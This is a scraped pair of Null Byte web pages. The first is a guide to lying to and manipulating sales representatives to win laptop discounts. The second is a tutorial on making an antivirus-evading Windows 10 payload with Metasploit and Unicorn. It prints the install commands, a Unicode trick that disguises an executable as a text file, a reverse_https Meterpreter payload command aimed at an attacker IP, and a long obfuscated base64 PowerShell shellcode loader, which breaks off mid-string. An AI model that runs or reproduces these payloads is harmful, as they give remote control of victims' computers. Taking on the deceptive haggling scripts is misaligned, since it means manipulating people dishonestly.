SimulationsCommunity Byte:HackThisSite, Realistic 2 - Real Hacking SimulationsCommunity Byte:HackThisSite, Realistic 1 - Real Hacking SimulationsNews:Student Sentenced to 8mo. in Jail for Hacking FacebookNews:Thinking about art school? Think again.How To:Conceal a USB Flash Drive in Everyday ItemsGoodnight Byte:HackThisSite, Realistic 4 - Real Hacking SimulationsHow To:How Hackers Use Your IP Address to Hack Your Computer & How to Stop ItNews:Anonymous Hackers Replace Police Supplier Website With β€˜Tribute to Jeremy Hamm
The Social Engineer's Guide to Buying an Expensive Laptop Β« Null Byte :: WonderHowTo
Laptops are almost a necessity in today's society. It doesn't help that a laptop that can actually increase your work productivity will put at least a $1,500 dent in your wallet. I'm sure you have searched around to try to find factory direct deals, or (shiver) even looked at used laptops, but that isn't the way to go. You need something that actually has a warranty, and good performance, but at the same time, doesn't require you to sell a kidney. This can cause quite a dilemma, as it can take some people months or years to save up for even the worst computer.Well, if you are a computer gamer, or just an enthusiast, you have probably heard ofAlienware. They are the most expensive, the most gorgeous, and above all else, the most powerful gaming laptops in the universe (no, people... having 3 hard drivesdoesn'tmake Sager better). The drawback of these beasts are the steep prices. To get the specifications maxed out Alienware, it will run you back 5 to 6 grand. This is the power that you get to play with:Screen:18.4"Β  1080p WLEDProcessor:Intel Core i7 2960XM 2.7GHz (3.7GHz with Turbo Boost, 8MB Cache)Memory:32GB Dual Channel DDR3 at 1333MHz (4DIMMS)GPU:Dual 2GB GDDR5 AMD Radeon 6990m (4GB)Storage:Up to 512GB Solid State Drive SATA hard driveMisc:SATA3, USB 3.0, HDMI input, 4 year warrantyand moreTotal:$6,949.00This is a force to be reckoned with. However, the toll for this gorgeous piece of hardware will do some damage to your wallet. What if it doesn't have to, though? What if I told you, that with some clever shopping, and some hardcore social engineering, I got this laptop down to $2,000? No joke. In today'sNull Byte, I am going to show youexactlywhat it takes to get the most out of your money from Alienware. I'm going to sleuth around and get the best price on parts and then finish off with some social engineering to lower my price even more. This isn'tjustfor Alienware, though. These methods are applicable to all things expensive. Pay close attention, this could save you enough money to buy acar.Social engineering is a natural-born talent for some people. Convincing someone to trust you, and playing on human emotion can really save your skin when it comes to big spending. I've used it to my advantage more than I can remember when it comes to purchasing things.Step1Prepare for BattleBefore we begin, we should shop around for upgraded parts and see if we can get them cheaper elsewhere. This will put a good dent in the preliminary price on our order, making minimal to no sacrifice in regards to performance. Upon looking around, here is the modified list that we can come up with:Screen:18.4"Β  1080p WLEDProcessor:Intel Core i7 2860QM 2.5GHz (3.6GHz with Turbo Boost, 8MB Cache). I swapped this out to the 2860QM because it costs half as much and can be easily overclocked to be faster than the 2960XM, while maintaining a 8MB cache size. Clearly a better option.Memory:16GB Kingston HyperXPnP Triple Channel DDR3 at 1866MHz (4DIMMS). I chose to order RAM from someone other than Alienware and "downgraded" from 32GB of 1333MHz to 16GB of Triple channel memory clocked at 1866MHz. This upgrade is much faster, and can be overclocked to 2000MHz, easily. Almost a 100% speed increase is achieved while we also save $1,780.00. This means that we also get 4GB of RAM for free with the laptop because it comes with it, stock. Sell it.GPU:Dual 2GB GDDR5 AMD Radeon 6990m (4GB). Stick with the dual AMDsβ€”they are faster than the nVidia 580m cards and are a lot cheaper. Option seems pretty clear to me.Storage:256GB OCZSATAIII SSD R/W 500/MBs. This drive is faster than any of the drives offered through Alienware.Β  I chose only one because an SSD larger than this, for now, is pretty ridiculous. The Alienware will still come with a 500GB HDD, which can be used for storage, so you can keep the OS and your games on the SSD to increase performance greatly.Warranty:1 year advanced warranty. I upgraded to the 1 year advanced plan to cover accidental damages. A lot of people do not know this, but a few months before your warranty runs out, you can call the factory and pay to have the warranty extended. Why pay for it now if we don't have to?New Preliminary Total:$2,860 on the Alienware. $3,380 is our new grand total, with extra parts included. We have already saved more than 50% for a rig that outperforms what we would have had.Step2Social Engineer FTWThere are a number of things that come into play when pulling this part off. Here is what we need to do to successfully lower the purchase price:GuidelinesCall on the phone.When you call, you can haggle with a sales rep. Contrary to popular belief, the prices on the website are never set in stone. When a sales rep. makes a sale, they get commission, so why would they push a customer away? You have the power. You have the money that they want. This is what opens the door to social engineering our way to victory.Order at the end of the month.Sales reps also have a quota that they need to fill. If you call enough times, you will get lucky and find someone that will offer you a special price. Believe me, they will be more than happy to accept your money on a discounted computer.Stay confident.Confidence is key to making your point. If the sales rep sees that you are weak, verbally, you will not get your reduced price. Would you let a bluffer get away with talking you down hundreds of dollars in commission? I don't think so!You can call back.If you don't get the deal you want, just keep calling back until you get someone willing to work with you. Set a goal for a price, and try to get as close to it as possible, or beat it.Use manipulative phrases."It costs XXX? But, I only have XXX much to spend.""I can only order one now, but I'm ordering 2 more in a few weeks, could you work with me on the price? I need it now."Get creative.The Flow of CoversationI called a few times to get the best quote possible. When you want to try to get a lower price, tell the representitive to email you the quote, and you should be able to keep the price quote they gave you for a few days. This locks in your price so that you are safe to try again.Call and ask to be connected to a US representitive.These are not outsourced jobs to different countries, so these reps have more freedom. This means they have the ability to lower the price more than anyone else.Be polite and courteous. Ask the rep. how their day is going. This can go a long way before you even start to talk about your machine's build. They will have a great disposition towards you, and often times will be more than willing to help you out.After you run through the build and they give you a quote, use some manipulative phrases. Here is what I did:Rep:"Your build is <reads off my parts list>, the price comes out to $2.760" (already cheaper).Me:"Oh, damn. Problem is, I am a little bit short right now, and need this laptop for work. My current laptop died, and I have a large chunk of money lying around for it, but I don't quite have enough for the specs I want. If I don't have a laptop, I can't do my job. So I'm bouncing back and forth beween decisions right now. I don't know if I want to sacrifice some power in an Alienware, and regret that I didn't wait to get a better one, or if I want to just get an Asus from Best Buy, because I can't afford to not have a computer."After a little while of spitting "pity me" lines for my laptop being broken, he lowered the price to $2,420.00, thanks to a coupon code and some friendly manners.I asked the rep., "What kind of bag does the system come with?". Now, I did my research. Alienware only offers bags for an extra fee, but since Iassumedthe system came with a bag, he was afraid of losing the sale and asked me, "Which one would you like? We have an over-the-shoulder messenger bag, and a backpack".Victory.After the quote was set up, I pushed it as far as I could take it.Me:"As I said, I really need this for work, so is it possible that you could be fast with it? I have work on Monday."Rep:"Sure, I can bump you up to next business day, free of charge, courtesy of Dell."Victory!I got the system I hoped for, for an insane $2,420.00 with a free messenger bagandnext day shipping. That's a savings of $4,529.00. I told you it was possible. I can't wait until this gorgeous machine is in my hands!Join Null Byte onIRC. Follow me onTwitterandGoogle+for the latest posts and updates.Want to start making money as a white hat hacker?Jump-start your hacking career with our2020 Premium Ethical Hacking Certification Training Bundlefrom the newNull Byte Shopand get over 60 hours of training from cybersecurity professionals.Buy Now (90% off) >Other worthwhile deals to check out:97% off The Ultimate 2021 White Hat Hacker Certification Bundle99% off The 2021 All-in-One Data Scientist Mega Bundle98% off The 2021 Premium Learn To Code Certification Bundle62% off MindMaster Mind Mapping Software: Perpetual LicenseImage bywindows7themesRelatedHack Like a Pro:The Ultimate Social Engineering HackHow To:Social Engineering - Total GuideHack Like a Pro:How to Spear Phish with the Social Engineering Toolkit (SET) in BackTrackHow To:Learn the Secrets of PsychologySocial Engineering:How to Use Persuasion to Compromise a Human TargetHow To:Bridge a network connection from a laptop to an XboxHow To:Product Chart Makes Finding Your Next Gadget EasySocial Engineering:The Most Powerful HackHow To:Use "SET", the Social-Engineer ToolkitHow To:Use Social Engineering to Hack ComputersHow To:Proof of Social Engineering Success!Weekend Homework:How to Become a Null Byte Contributor (2/17/2012)Listen In:Live Social Engineering Phone Calls with Professional Social Engineers (Final Session)Listen In:Live Social Engineering Phone Calls with Professional Social Engineers (Week 2)Listen In:Live Social Engineering Phone Calls with Professional Social EngineersSocial Engineering, Part 1:Scoring a Free Cell PhoneNews:Live Social EngineeringXbox LIVE Achievement:How to Earn Free Microsoft Points with Social EngineeringHow To:Advanced Social Engineering, Part 1: Exact Revenge on Craigslist Scammers with Tabnab PhishingHow To:Score Free Game Product Keys with Social EngineeringHow To:Social Engineer Your Way Into an Amusement Park for FreeSocial Engineering, Part 2:Hacking a Friend's Facebook PasswordNews:Google social web engineer Joseph Smarr talks about lessons from Google+Organic Produce:Do I Have to Buy It?News:Social Hacking and Protecting Yourself from Prying EyesHow To:The Official Google+ Insider's Guide IndexSocial Engineering:The BasicsWeekend Homework:How to Become a Null Byte Contributor (2/10/2012)How To:Things to Do on WonderHowTo (11/30 - 12/06)How To:recognize Crowd Control - Part 1How To:9 Tips for Maximizing Your Laptop's Battery LifeNews:Is Your Dream Gaming PC Worth It?How To:Make an Easy Halloween Nerd CostumeNews:Cool Shatter TrailerNews:PopCap Bought by EA, Earns $750 Million Bonus PointsNews:Frozen Screen of Death
Hacking Windows 10: How to Create an Undetectable Payload, Part 1 (Bypassing Antivirus Software) Β« Null Byte :: WonderHowTo
Hackers are always seekingzero-day exploitsthat can successfully bypass Windows 10's security features. There has been extensive research into creatingundetectable malwareand entire GitHub projects dedicated to automating the creation of undetectable payloads such asWinPayloads,Veil v3, andTheFatRat.With a bit ofsocial engineering, tricking a target user into opening a malicious file can be as simple as injecting a bit of Unicode into the file name. For example, the below GIF shows a Windows executable (EXE) disguised to appear as a normal text file (TXT) β€” even with "Hide extensions for known file types" disabled in the File Explorer Options.Make no mistake, the file on the right is an executable and, more importantly, recognized by the Windows operating system as an executable. When the fake text file is clicked, it opens a new document using Notepad, the default text editor in Windows 10. After opening Notepad, it silently executes an embedded PowerShell payload (made with Unicorn) which creates a backdoor to the now compromised Windows computer.Unicorn, created byTrustedSec, is a simple tool designed to assist penetration tester's withPowerShell downgrade attacksand injecting sophisticated shellcode payloads straight into memory. The techniques utilized by Unicorn are based on the work ofMatthew Graeberand TrustedSec founderDavid Kennedy.Step 1: Install Metasploit FrameworkMetasploitis a dependency of Unicorn. Before installing Unicorn, I'll quickly guide readers through aMetasploit installationto ensure it's entirely up to date using the GitHub repository.Kali does an excellent job of maintaining stable versions of Metasploit, but I'll show how to install the absolute latest version. First, remove any older versions of Metasploit that may be pre-installed in Kali.apt-get remove metasploit-frameworkThen, use cURL to download the Metasploit installer.curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstallUpgradethe newly createdmsfinstallfile permissions to ensure it will execute in Kali.chmod 755 msfinstallThen, execute the installer script with./msfinstall../msfinstall Adding metasploit-framework to your repository list..OK Updating package cache..OK Checking for and installing update.. Reading package lists... Done Building dependency tree Reading state information... Done The following NEW packages will be installed: metasploit-framework 0 upgraded, 1 newly installed, 0 to remove and 124 not upgraded. Need to get 161 MB of archives. After this operation, 377 MB of additional disk space will be used. Get:1 http://downloads.metasploit.com/data/releases/metasploit-framework/apt lucid/main amd64 metasploit-framework amd64 4.16.57+20180529103642.git.4.6219ce0~1rapid7-1 [161 MB] Get:1 http://downloads.metasploit.com/data/releases/metasploit-framework/apt lucid/main amd64 metasploit-framework amd64 4.16.57+20180529103642.git.4.6219ce0~1rapid7-1 [161 MB] Fetched 65.7 MB in 11min 39s (93.9 kB/s) Selecting previously unselected package metasploit-framework. (Reading database ... 145965 files and directories currently installed.) Preparing to unpack .../metasploit-framework_4.16.57+20180529103642.git.4.6219ce0~1rapid7-1_amd64.deb ... Unpacking metasploit-framework (4.16.57+20180529103642.git.4.6219ce0~1rapid7-1) ... Setting up metasploit-framework (4.16.57+20180529103642.git.4.6219ce0~1rapid7-1) ... update-alternatives: using /opt/metasploit-framework/bin/msfbinscan to provide /usr/bin/msfbinscan (msfbinscan) in auto mode update-alternatives: using /opt/metasploit-framework/bin/msfconsole to provide /usr/bin/msfconsole (msfconsole) in auto mode update-alternatives: using /opt/metasploit-framework/bin/msfd to provide /usr/bin/msfd (msfd) in auto mode update-alternatives: using /opt/metasploit-framework/bin/msfdb to provide /usr/bin/msfdb (msfdb) in auto mode update-alternatives: using /opt/metasploit-framework/bin/msfelfscan to provide /usr/bin/msfelfscan (msfelfscan) in auto mode update-alternatives: using /opt/metasploit-framework/bin/msfmachscan to provide /usr/bin/msfmachscan (msfmachscan) in auto mode update-alternatives: using /opt/metasploit-framework/bin/msfpescan to provide /usr/bin/msfpescan (msfpescan) in auto mode update-alternatives: using /opt/metasploit-framework/bin/msfrop to provide /usr/bin/msfrop (msfrop) in auto mode update-alternatives: using /opt/metasploit-framework/bin/msfrpc to provide /usr/bin/msfrpc (msfrpc) in auto mode update-alternatives: using /opt/metasploit-framework/bin/msfrpcd to provide /usr/bin/msfrpcd (msfrpcd) in auto mode update-alternatives: using /opt/metasploit-framework/bin/msfupdate to provide /usr/bin/msfupdate (msfupdate) in auto mode update-alternatives: using /opt/metasploit-framework/bin/msfvenom to provide /usr/bin/msfvenom (msfvenom) in auto mode update-alternatives: using /opt/metasploit-framework/bin/metasploit-aggregator to provide /usr/bin/metasploit-aggregator (metasploit-aggregator) in auto mode Run msfconsole to get started W: --force-yes is deprecated, use one of the options starting with --allow instead.When the installer is completed, there will be a new metasploit-framework/ directory in the /opt directory.Don't Miss:The Basics of Using Metasploit for HackingStep 2: Install UnicornWith the Metasploit installation taken care of, theUnicorn GitHub repositorycan be cloned usinggit clonegithub.com/trustedsec/unicorn.git clone https://github.com/trustedsec/unicorn Cloning into 'unicorn'... remote: Counting objects: 340, done. remote: Total 340 (delta 0), reused 0 (delta 0), pack-reused 340 Receiving objects: 100% (340/340), 163.94 KiB | 45.00 KiB/s, done. Resolving deltas: 100% (215/215), done.Then, change into the new Unicorn directory using thecdcommand.cd unicorn/To view the available Unicorn options and comprehensive descriptions of each attack, use the./unicorn.py --helpargument../unicorn.py --help -------------------- Magic Unicorn Attack Vector v3.1 ----------------------------- Native x86 powershell injection attacks on any Windows platform. Written by: Dave Kennedy at TrustedSec (https://www.trustedsec.com) Twitter: @TrustedSec, @HackingDave Credits: Matthew Graeber, Justin Elze, Chris Gates Happy Magic Unicorns. Usage: python unicorn.py payload reverse_ipaddr port <optional hta or macro, crt> PS Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 PS Down/Exec: python unicorn.py windows/download_exec url=http://badurl.com/payload.exe Macro Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 macro Macro Example CS: python unicorn.py <cobalt_strike_file.cs> cs macro Macro Example Shellcode: python unicorn.py <path_to_shellcode.txt> shellcode macro HTA Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 hta HTA Example CS: python unicorn.py <cobalt_strike_file.cs> cs hta HTA Example Shellcode: python unicorn.py <path_to_shellcode.txt>: shellcode hta DDE Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 dde CRT Example: python unicorn.py <path_to_payload/exe_encode> crt Custom PS1 Example: python unicorn.py <path to ps1 file> Custom PS1 Example: python unicorn.py <path to ps1 file> macro 500 Cobalt Strike Example: python unicorn.py <cobalt_strike_file.cs> cs (export CS in C# format) Custom Shellcode: python unicorn.py <path_to_shellcode.txt> shellcode (formatted 0x00) Help Menu: python unicorn.py --helpThere are several interesting and effective Unicorn options. In this article, I'll be focusing on the PowerShell and Meterpreter solution.Step 3: Generate the PayloadTo create a payload with Unicorn, use the below command../unicorn.py windows/meterpreter/reverse_https <ATTACKER-IP-ADDRESS> <PORT>Unicorn will use the Metasploitreverse_httpsmodule to connect to the attackers IP address using the specified port.[*] Generating the payload shellcode.. This could take a few seconds/minutes as we create the shellcode... ,/ // ,// ___ /| |// `__/\_ --(/|___/-/ \|\_-\___ __-_`- /-/ \. |\_-___,-\_____--/_)' ) \ \ -_ / __ \( `( __`\| `\__| |\)\ ) /(/| ,._____., ',--//-| \ | ' / / __. \, / /,---| \ / / / _. \ \ `/`_/ _,' | | | | ( ( \ | ,/\'__/'/ | | | \ \`--, `_/_------______/ \( )/ | | \ \_. \, \___/\ | | \_ \ \ \ \ \ \_ \ \ / \ \ \ \._ \__ \_| | \ \ \___ \ \ | \ \__ \__ \ \_ | \ | | \_____ \ ____ | | | \ \__ ---' .__\ | | | \ \__ --- / ) | \ / \ \____/ / ()( \ `---_ /| \__________/(,--__ \_________. | ./ | | \ \ `---_\--, \ \_,./ | | \ \_ ` \ /`---_______-\ \\ / \ \.___,`| / \ \\ \ \ | \_ \| \ ( |: | \ \ \ | / / | ; \ \ \ \ ( `_' \ | \. \ \. \ `__/ | | \ \ \. \ | | \ \ \ \ ( ) \ | \ | | | | \ \ \ I ` ( __; ( _; ('-_'; |___\ \___: \___: aHR0cHM6Ly93d3cuYmluYXJ5ZGVmZW5zZS5jb20vd3AtY29udGVudC91cGxvYWRzLzIwMTcvMDUvS2VlcE1hdHRIYXBweS5qcGc= Written by: Dave Kennedy at TrustedSec (https://www.trustedsec.com) Twitter: @TrustedSec, @HackingDave Happy Magic Unicorns. [********************************************************************************************************] -----POWERSHELL ATTACK INSTRUCTIONS---- Everything is now generated in two files, powershell_attack.txt and unicorn.rc. The text file contains all of the code needed in order to inject the powershell attack into memory. Note you will need a place that supports remote command injection of some sort. Often times this could be through an excel/word doc or through psexec_commands inside of Metasploit, SQLi, etc.. There are so many implications and scenarios to where you can use this attack at. Simply paste the powershell_attack.txt command in any command prompt window or where you have the ability to call the powershell executable and it will give a shell back to you. This attack also supports windows/download_exec for a payload method instead of just Meterpreter payloads. When using the download and exec, simply put python unicorn.py windows/download_exec url=https://www.thisisnotarealsite.com/payload.exe and the powershell code will download the payload and execute. Note that you will need to have a listener enabled in order to capture the attack. [*******************************************************************************************************] [*] Exported powershell output code to powershell_attack.txt. [*] Exported Metasploit RC file as unicorn.rc. Run msfconsole -r unicorn.rc to execute and create listener.When Unicorn is done generating the payload, two new files will be created. The first ispowershell_attack.txtwhich can be viewed using thecatpowershell_attack.txtcommand. This reveals the PowerShell code that will execute on the target Windows 10 machine and create themeterpreterconnection.cat powershell_attack.txt powershell /w 1 /C "s''v Mx -;s''v CV e''c;s''v nU ((g''v Mx).value.toString()+(g''v CV).value.toString());powershell (g''v nU).value.toString() ('JAB0AFQAVgAgAD0AIAAnACQAYwBnACAAPQAgACcAJwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgASQBuAHQAUAB0AHIAIABsAHAAQQBkAGQAcgBlAHMAcwAsACAAdQBpAG4AdAAgAGQAdwBTAGkAegBlACwAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsACAAdQBpAG4AdAAgAGYAbABQAHIAbwB0AGUAYwB0ACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsACAAdQBpAG4AdAAgAGQAdwBTAHQAYQBjAGsAUwBpAHoAZQAsACAASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwAIAB1AGkAbgB0ACAAZAB3AEMAcgBlAGEAdABpAG8AbgBGAGwAYQBnAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEkAZAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByAHQALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAJwA7ACQAWABkACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAYwBnACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHQAVAAgAD0AIAAwAHgAZgBjACwAMAB4AGUAOAAsADAAeAA4ADIALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAAwADAALAAwAHgANgAwACwAMAB4ADgAOQAsADAAeABlADUALAAwAHgAMwAxACwAMAB4AGMAMAAsADAAeAA2ADQALAAwAHgAOABiACwAMAB4ADUAMAAsADAAeAAzADAALAAwAHgAOABiACwAMAB4ADUAMgAsADAAeAAwAGMALAAwAHgAOABiACwAMAB4ADUAMgAsADAAeAAxADQALAAwAHgAOABiACwAMAB4ADcAMgAsADAAeAAyADgALAAwAHgAMABmACwAMAB4AGIANwAsADAAeAA0AGEALAAwAHgAMgA2ACwAMAB4ADMAMQAsADAAeABmAGYALAAwAHgAYQBjACwAMAB4ADMAYwAsADAAeAA2ADEALAAwAHgANwBjACwAMAB4ADAAMgAsADAAeAAyAGMALAAwAHgAMgAwACwAMAB4AGMAMQAsADAAeABjAGYALAAwAHgAMABkACwAMAB4ADAAMQAsADAAeABjADcALAAwAHgAZQAyACwAMAB4AGYAMgAsADAAeAA1ADIALAAwAHgANQA3ACwAMAB4ADgAYgAsADAAeAA1ADIALAAwAHgAMQAwACwAMAB4ADgAYgAsADAAeAA0AGEALAAwAHgAMwBjACwAMAB4ADgAYgAsADAAeAA0AGMALAAwAHgAMQAxACwAMAB4ADcAOAAsADAAeABlADMALAAwAHgANAA4ACwAMAB4ADAAMQAsADAAeABkADEALAAwAHgANQAxACwAMAB4ADgAYgAsADAAeAA1ADkALAAwAHgAMgAwACwAMAB4ADAAMQAsADAAeABkADMALAAwAHgAOABiACwAMAB4ADQAOQAsADAAeAAxADgALAAwAHgAZQAzACwAMAB4ADMAYQAsADAAeAA0ADkALAAwAHgAOABiACwAMAB4ADMANAAsADAAeAA4AGIALAAwAHgAMAAxACwAMAB4AGQANgAsADAAeAAzADEALAAwAHgAZgBmACwAMAB4AGEAYwAsADAAeABjADEALAAwAHgAYwBmACwAMAB4ADAAZAAsADAAeAAwADEALAAwAHgAYwA3ACwAMAB4ADMAOAAsADAAeABlADAALAAwAHgANwA1ACwAMAB4AGYANgAsADAAeAAwADMALAAwAHgANwBkACwAMAB4AGYAOAAsADAAeAAzAGIALAAwAHgANwBkACwAMAB4ADIANAAsADAAeAA3ADUALAAwAHgAZQA0ACwAMAB4ADUAOAAsADAAeAA4AGIALAAwAHgANQA4ACwAMAB4ADIANAAsADAAeAAwADEALAAwAHgAZAAzACwAMAB4ADYANgAsADAAeAA4AGIALAAwAHgAMABjACwAMAB4ADQAYgAsADAAeAA4AGIALAAwAHgANQA4ACwAMAB4ADEAYwAsADAAeAAwADEALAAwAHgAZAAzACwAMAB4ADgAYgAsADAAeAAwADQALAAwAHgAOABiACwAMAB4ADAAMQAsADAAeABkADAALAAwAHgAOAA5ACwAMAB4ADQANAAsADAAeAAyADQALAAwAHgAMgA0ACwAMAB4ADUAYgAsADAAeAA1AGIALAAwAHgANgAxACwAMAB4ADUAOQAsADAAeAA1AGEALAAwAHgANQAxACwAMAB4AGYAZgAsADAAeABlADAALAAwAHgANQBmACwAMAB4ADUAZgAsADAAeAA1AGEALAAwAHgAOABiACwAMAB4ADEAMgAsADAAeABlAGIALAAwAHgAOABkACwAMAB4ADUAZAAsADAAeAA2ADgALAAwAHgANgBlACwAMAB4ADYANQAsADAAeAA3ADQALAAwAHgAMAAwACwAMAB4ADYAOAAsADAAeAA3ADcALAAwAHgANgA5ACwAMAB4ADYAZQAsADAAeAA2ADkALAAwAHgANQA0ACwAMAB4ADYAOAAsADAAeAA0AGMALAAwAHgANwA3ACwAMAB4ADIANgAsADAAeAAwADcALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAAzADEALAAwAHgAZABiACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANQAzACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANgA4ACwAMAB4ADMAYQAsADAAeAA1ADYALAAwAHgANwA5ACwAMAB4AGEANwAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANgBhACwAMAB4ADAAMwAsADAAeAA1ADMALAAwAHgANQAzACwAMAB4ADYAOAAsADAAeABiAGIALAAwAHgAMAAxACwAMAB4ADAAMAAsADAAeAAwADAALAAwAHgAZQA4ACwAMAB4AGIAMAAsADAAeAAwADAALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAAyAGYALAAwAHgAMwA2ACwAMAB4ADMANAAsADAAeAA1ADIALAAwAHgANgAxACwAMAB4ADcAMgAsADAAeAAzADQALAAwAHgANQA3ACwAMAB4ADQAMgAsADAAeAA3ADkALAAwAHgANQAwACwAMAB4ADcANAAsADAAeAA3ADYALAAwAHgAMwAwACwAMAB4ADUANwAsADAAeAAzADcALAAwAHgANQAxACwAMAB4ADQAZQAsADAAeAA0AGUALAAwAHgAMwA0ACwAMAB4ADUANQAsADAAeAA0ADYALAAwAHgANQAxACwAMAB4ADMAMgAsADAAeAA1ADUALAAwAHgANQAxACwAMAB4ADcAMQAsADAAeAA3ADIALAAwAHgANwA5ACwAMAB4ADQAZQAsADAAeAAwADAALAAwAHgANQAwACwAMAB4ADYAOAAsADAAeAA1ADcALAAwAHgAOAA5ACwAMAB4ADkAZgAsADAAeABjADYALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA4ADkALAAwAHgAYwA2ACwAMAB4ADUAMwAsADAAeAA2ADgALAAwAHgAMAAwACwAMAB4ADMA'+'MgAsADAAeABlADAALAAwAHgAOAA0ACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANQAzACwAMAB4ADUANwAsADAAeAA1ADMALAAwAHgANQA2ACwAMAB4ADYAOAAsADAAeABlAGIALAAwAHgANQA1ACwAMAB4ADIAZQAsADAAeAAzAGIALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA5ADYALAAwAHgANgBhACwAMAB4ADAAYQAsADAAeAA1AGYALAAwAHgANgA4ACwAMAB4ADgAMAAsADAAeAAzADMALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAA4ADkALAAwAHgAZQAwACwAMAB4ADYAYQAsADAAeAAwADQALAAwAHgANQAwACwAMAB4ADYAYQAsADAAeAAxAGYALAAwAHgANQA2ACwAMAB4ADYAOAAsADAAeAA3ADUALAAwAHgANAA2ACwAMAB4ADkAZQAsADAAeAA4ADYALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA1ADMALAAwAHgANQAzACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANQA2ACwAMAB4ADYAOAAsADAAeAAyAGQALAAwAHgAMAA2ACwAMAB4ADEAOAAsADAAeAA3AGIALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA4ADUALAAwAHgAYwAwACwAMAB4ADcANQAsADAAeAAxADYALAAwAHgANgA4ACwAMAB4ADgAOAAsADAAeAAxADMALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAA2ADgALAAwAHgANAA0ACwAMAB4AGYAMAAsADAAeAAzADUALAAwAHgAZQAwACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgANABmACwAMAB4ADcANQAsADAAeABjAGQALAAwAHgANgA4ACwAMAB4AGYAMAAsADAAeABiADUALAAwAHgAYQAyACwAMAB4ADUANgAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADYAYQAsADAAeAA0ADAALAAwAHgANgA4ACwAMAB4ADAAMAAsADAAeAAxADAALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAA2ADgALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAA0ADAALAAwAHgAMAAwACwAMAB4ADUAMwAsADAAeAA2ADgALAAwAHgANQA4ACwAMAB4AGEANAAsADAAeAA1ADMALAAwAHgAZQA1ACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgAOQAzACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgAOAA5ACwAMAB4AGUANwAsADAAeAA1ADcALAAwAHgANgA4ACwAMAB4ADAAMAAsADAAeAAyADAALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAA1ADMALAAwAHgANQA2ACwAMAB4ADYAOAAsADAAeAAxADIALAAwAHgAOQA2ACwAMAB4ADgAOQAsADAAeABlADIALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA4ADUALAAwAHgAYwAwACwAMAB4ADcANAAsADAAeABjAGQALAAwAHgAOABiACwAMAB4ADAANwAsADAAeAAwADEALAAwAHgAYwAzACwAMAB4ADgANQAsADAAeABjADAALAAwAHgANwA1ACwAMAB4AGUANQAsADAAeAA1ADgALAAwAHgAYwAzACwAMAB4ADUAZgAsADAAeABlADgALAAwAHgANgA5ACwAMAB4AGYAZgAsADAAeABmAGYALAAwAHgAZgBmACwAMAB4ADMAMQAsADAAeAAzADkALAAwAHgAMwAyACwAMAB4ADIAZQAsADAAeAAzADEALAAwAHgAMwA2ACwAMAB4ADMAOAAsADAAeAAyAGUALAAwAHgAMwAxACwAMAB4ADIAZQAsADAAeAAzADUALAAwAHgAMAAwADsAJABxAFYAIAA9ACAAMAB4ADEAMAAwADcAOwBpAGYAIAAoACQAdABUAC4ATABlAG4AZwB0AGgAI